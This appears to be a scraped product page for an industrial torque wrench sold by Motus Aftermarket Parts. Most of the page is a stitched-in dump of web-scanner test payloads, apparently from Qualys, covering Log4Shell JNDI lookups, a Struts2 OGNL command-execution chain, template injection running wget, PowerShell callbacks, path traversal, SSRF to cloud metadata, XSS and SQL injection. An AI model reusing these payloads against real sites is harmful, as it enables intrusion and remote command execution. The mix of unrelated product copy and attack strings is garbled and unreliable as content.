1/2″ DR. INDUSTRIAL TORQUE WRENCH (60~340 NM)
INDUSTRIAL TORQUE WRENCH (60~340 NM)
• Scale 2.0, Length 614mm
• Industrial quality
• Tolerance of torque ±3%
• Easy torque-adjusting design
• Quick release ratchet head
1/2″ DR. INDUSTRIAL TORQUE WRENCH (60~340 NM)
INDUSTRIAL TORQUE WRENCH (60~340 NM)
• Scale 2.0, Length 614mm
• Industrial quality
• Tolerance of torque ±3%
• Easy torque-adjusting design
• Quick release ratchet head
Motus Aftermarket Parts (MAP) trades in the replacement automotive parts industry, marketing and distributing quality automotive parts or components, DIY, DIFM (do-it-for-me) and leisure travel products.
1
“‘>
‘ onEvent=X144621768Y1_2Z
1
1″‘>
z–>
1
1
” onEvent=X144621768Y1_2Z
qssw4Dv5104=7
%3cscript z%3e_q(y)%3c/script%3e
qss{{q=(2*2.0)}}qss
{{333*334}}
q
Content-Type:text/html
Content-Length: 190
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2
AA
q
Qualys_resp_hdr_injection: Vulnerable
1
;–
1
/*
“
(
1
//..//..//..//..//..//..//..//etc/passwd
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
%25{(#_=’multipart/form-data’).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
a(){}phpinfo(); function a
|netstat -an
http://rfitest/
“;(function(){qxsso5EL5fvx});/**/”
qualys(aqxssTb1K7Cug)xyz
9;(function(){qxssU6MhNTpP});//
*/;(function(){qxss7NP50GU4});/*
“-qxss5Ji42GW7()-“
{23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}
(23.0231*213.759)
http://169.254.169.254/latest/meta-data/
http://04b5e7357d3548e0a50c8adf9580375d7b0f1896.10521528121399237.1423290737.ssrf01.ssrf.eu2.qualysperiscope.com.
${jndi:rmi://bfcae436d40d84486991938a0233f2608f4d83d3.10521528121399237.2822532180.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://53d7bd1ed746225faad24731332ea2336b403c33.10521528121399237.1828612756.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
${jnd${123%ff:-${123%ff:-i:}}ldap://6bbef9ba37c9c38e1c9a91b1305c7858d6717a91.10521528121399237.1234816588.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
${jndi:dns://ebdef0e13e15b4a67938105c6dfad70034020719.10521528121399237.1828495013.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://aa44f99c9c415dea213f0cd581fd530c5cfcdefc.10521528121399237.2069950500.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
$%7Bdns:address%7C@CIPHER@.@UNIQUEID@.@[email protected].@DOMAIN@%7D
powershell -c iwr -uri http://@CIPHER@.@UNIQUEID@.@[email protected].@DOMAIN@
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://f411eb1e8513687af5201f0da974dd38e1f7108c.10521528121399237.2368014807.oscomm15019101.oscomm.eu2.qualysperiscope.com.’).read() }}
1′) or 2634=2634 —
1′ or 3789=3789 —
1 or 4325=4325 —
1 or NULL IS NULL
1 and NULL IS NULL
1′) or ‘swqtp’=’swqtp
1′ or ‘tpklq’=’tpklq
11 or 11=11
1′ or true() or ‘and’ = ‘and
1 or true() or ‘and’ = ‘and’
1″ or true() or “and” = “and
1
aaaa&ping -n 92 localhost&
|ping -c2 -i56 localhost
1WAITFOR DELAY ’00:00:29′
1;WAITFOR DELAY ’00:00:29′;
1);WAITFOR DELAY ’00:00:29′–
1′;WAITFOR DELAY ’00:00:29′–
1′);WAITFOR DELAY ’00:00:29′–
1′,0,0);WAITFOR DELAY’00:00:29′–
1′ + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + ‘
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*’XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR’|”XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); — OR”*/
1′; var djci=sleep(29*1000);//
1′ + sleep(29*100*Math.sqrt(100)) + ‘
1(#context[“xwork.MethodAccessor.denyMethodExecution”]= new java.lang.Boolean(false), #_memberAccess[“allowStaticMethodAccess”]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
https://www.qualys.com
https://www.qualys.com?comment=1